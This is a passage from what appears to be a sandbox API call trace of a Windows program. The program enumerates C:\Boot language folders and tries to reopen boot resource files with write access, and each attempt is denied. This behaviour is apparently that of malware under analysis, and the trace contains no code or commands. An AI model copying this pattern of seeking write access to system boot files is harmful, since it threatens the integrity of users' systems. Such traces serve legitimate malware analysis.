(HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0084.474] AreFileApisANSI () returned 1 [0084.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.474] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 30 [0084.474] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.474] GetFileType (hFile=0x354) returned 0x1 [0084.474] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.474] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.474] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.475] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.475] CloseHandle (hObject=0x354) returned 1 [0084.475] AreFileApisANSI () returned 1 [0084.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.475] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52fc8 [0084.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x52fc8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned 30 [0084.475] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.475] GetLastError () returned 0x5 [0084.475] GetLastError () returned 0x5 [0084.475] SetLastError (dwErrCode=0x5) [0084.475] GetLastError () returned 0x5 [0084.475] SetLastError (dwErrCode=0x5) [0084.475] GetLastError () returned 0x5 [0084.475] SetLastError (dwErrCode=0x5) [0084.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0084.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.475] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.475] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.475] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0084.476] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.476] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.476] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.477] AreFileApisANSI () returned 1 [0084.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sv-SE\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sv-SE\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0084.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.477] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0084.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.477] AreFileApisANSI () returned 1 [0084.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.477] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sv-SE\\memtest.exe.mui") returned 30 [0084.477] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x354 [0084.477] GetFileType (hFile=0x354) returned 0x1 [0084.477] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.477] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0084.478] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0084.478] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0084.478] CloseHandle (hObject=0x354) returned 1 [0084.478] AreFileApisANSI () returned 1 [0084.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0084.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x52dd0 [0084.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x52dd0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\sv-SE\\memtest.exe.mui") returned 30 [0084.478] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.478] GetLastError () returned 0x5 [0084.478] GetLastError () returned 0x5 [0084.478] SetLastError (dwErrCode=0x5) [0084.478] GetLastError () returned 0x5 [0084.478] SetLastError (dwErrCode=0x5) [0084.478] GetLastError () returned 0x5 [0084.479] SetLastError (dwErrCode=0x5) [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.479] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69308, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧꾘")) returned 0 [0084.479] FindClose (in: hFindFile=0x782d0 | out: hFindFile=0x782d0) returned 1 [0084.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x467b8 | out: hHeap=0x20000) returned 1 [0084.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0084.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.479] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.479] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.479] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.480] AreFileApisANSI () returned 1 [0084.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\tr-TR", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\tr-TR", lpUsedDefaultChar=0x0) returned 14 [0084.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.480] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0084.480] AreFileApisANSI () returned 1 [0084.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88658 [0084.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88658, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\tr-TR") returned 14 [0084.480] CreateFileW (lpFileName="C:\\Boot\\tr-TR" (normalized: "c:\\boot\\tr-tr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.480] GetLastError () returned 0x5 [0084.480] GetLastError () returned 0x5 [0084.480] SetLastError (dwErrCode=0x5) [0084.480] GetLastError () returned 0x5 [0084.480] SetLastError (dwErrCode=0x5) [0084.480] GetLastError () returned 0x5 [0084.480] SetLastError (dwErrCode=0x5) [0084.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.480] AreFileApisANSI () returned 1 [0084.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0084.480] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88680 [0084.481] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x327f960, cbMultiByte=-1, lpWideCharStr=0x88680, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\tr-TR") returned 14 [0084.481] CreateFileW (lpFileName="C:\\Boot\\tr-TR" (normalized: "c:\\boot\\tr-tr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.481] GetLastError () returned 0x5 [0084.481] GetLastError () returned 0x5 [0084.481] SetLastError (dwErrCode=0x5) [0084.481] GetLastError () returned 0x5 [0084.481] SetLastError (dwErrCode=0x5) [0084.481] GetLastError () returned 0x5 [0084.481] SetLastError (dwErrCode=0x5) [0084.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0084.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.481] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.481] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206a30, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0084.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.481] FindFirstFileExW (in: lpFileName="C:\\Boot\\tr-TR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x780d0 [0084.481] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.482] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0084.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52fc8 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0084.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.482] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52fc8 | out: hHeap=0x20000) returned 1 [0084.483] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: 